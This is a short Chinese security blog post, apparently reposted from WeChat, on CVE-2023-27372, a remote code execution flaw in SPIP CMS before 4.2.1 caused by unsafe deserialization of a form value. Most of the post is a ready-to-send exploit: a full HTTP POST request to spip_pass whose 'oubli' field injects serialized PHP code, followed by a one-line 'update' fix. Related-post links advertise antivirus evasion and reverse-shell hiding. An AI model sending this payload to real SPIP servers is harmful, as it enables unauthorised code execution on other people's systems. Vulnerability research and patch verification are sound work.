CVE-2023-27372 RCE漏洞(附EXP)
2023-7-8 15:48:16 Author: EchoSec(查看原文) 阅读量:201 收藏

0x01 前言

SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当,没有对序列化字符串进行过滤,从而触发命令执行漏洞

0x02 漏洞等级

0x03 影响版本

SPIP  < 4.2.1

0x04 漏洞复现

访问payload页面是这个酱紫

/spip.php?page=spip_pass

EXP:

POST /spip.php?page=spip_pass HTTP/1.1Host: 1.1.1.1Content-Length: 185Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: cibcInit=ouiConnection: close
page=spip_pass&formulaire_action=oubli&formulaire_action_args=E1nK0hfOPllDtCUbG6L94SlEpZi7Vz17IKUbf0ZB6ET0WbEHeXrw9tNNCEWjm0ac0%2F4DuboKIZvygjRh&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

0x05 修复方案

建议及时更新至最新版本。

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487880&idx=1&sn=9125265fcfe28890d5de575ca1ca2c3b&chksm=fcdf4d97cba8c481e8e0dcff79ac87fb7f334b7e3419f9483ddb844dfb5128c7f4d7e39f1d76#rd
如有侵权请联系:admin#unsafe.sh